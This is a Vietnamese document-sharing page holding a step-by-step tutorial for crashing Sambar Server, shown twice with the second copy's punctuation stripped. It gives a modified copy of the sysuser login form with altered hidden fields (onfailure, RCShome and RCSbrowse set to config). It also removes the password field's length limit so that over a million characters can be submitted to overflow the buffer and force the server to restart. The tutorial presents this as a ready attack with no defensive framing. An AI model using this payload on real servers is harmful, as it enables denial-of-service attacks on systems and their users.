tailieunhanh - Lỗi tràn bộ đệm của Server Sambar

Lỗi tràn bộ đệm của Server Sambar : CÁCH KHAI THÁC: Bạn phải biết được đường dẫn (ở sambar là c:\sambar ) của form đăng nhập sysuser: BƯỚC 1: đi tới đường dẫn của form đăng nhập sysuser, như http://localhost/sysuser/. BƯỚC 2: copy và paste đoạn mã của form đăng nhập (toàn bộ) lên 1 trang khác và rename thành . BƯỚC 3: đặt vào đúng chỗ http://localhost/ hoặc url cho server sambar của bạn ,cái này cho form và images , tất nhiên, form phải được connect đến đúng địa chỉ url của script server. CODE [FORM METHOD=POST. | Lỗi tràn bộ đệm của Server Sambar CÁCH KHAI THÁC Bạn phải biết được đường dẫn ở sambar là c sambar của form đăng nhập sysuser BƯỚC 1 đi tới đường dẫn của form đăng nhập sysuser như http localhost sysuser . BƯỚC 2 copy và paste đoạn mã của form đăng nhập toàn bộ lên 1 trang khác và rename thành . BƯỚC 3 đặt vào đúng chỗ http localhost hoặc url cho server sambar của bạn cái này cho form và images tất nhiên form phải được connect đến đúng địa chỉ url của script server. CODE FORM METHOD POST ACTION http localhost session login onsubmit return FormValidator this INPUT TYPE hidden NAME RCpage VALUE http localhost sysuser This is your desktop installation. INPUT TYPE hidden NAME onfailure VALUE http localhost sysuser bạn có thể thay đổi cái này để làm tăng việc tràn bộ đệm giống như một script cgi cái này có thể là tấn công bằng DoS INPUT TYPE hidden NAME start VALUE 1 input TYPE hidden NAME RCSdesktop VALUE true input TYPE hidden NAME RCSsort VALUE desc input TYPE hidden NAME RCSstyle VALUE txtconvert input TYPE hidden NAME RCSwrap VALUE 60 input TYPE hidden NAME RCScount VALUE 25 input TYPE hidden NAME RCSfolder VALUE inbox input TYPE hidden NAME RCSpath VALUE input TYPE hidden NAME RCShome VALUE config Đây là vấn đề input TYPE hidden NAME RCSbrowse VALUE config Đây là vấn đề input TYPE hidden NAME RCSsortby VALUE name BƯỚC 4 bây giờ bạn có thể refresh và login dùng một user và password hợp lệ nếu bạn muốn chứng tỏ một lỗi nữa ở bước 6 BƯỚC 5 bây bạn phải nhấn submit chờ và nếu bạn chạy server trên máy của bạn thì server se trở nên dễ bị đổ nếu bạn tiếp tục send thì server phải restart hoặc máy của bạn restart trong suốt quá trình tấn công . BƯỚC 6 lỗi thứ hai là tràn bộ đệm ở vùng mật khẩu bạn có thể chèn vào hơn 1 triệu ký tự và submit nó nhưng phải edit đoạn mã này trên máy của bạn CODE INPUT TYPE PASSWORD NAME RCpwd VALUE MAXLENGTH 40 thay đổi cái này thành. INPUT TYPE PASSWORD NAME RCpwd VALUE đặt text của bạn ở đây .

TỪ KHÓA LIÊN QUAN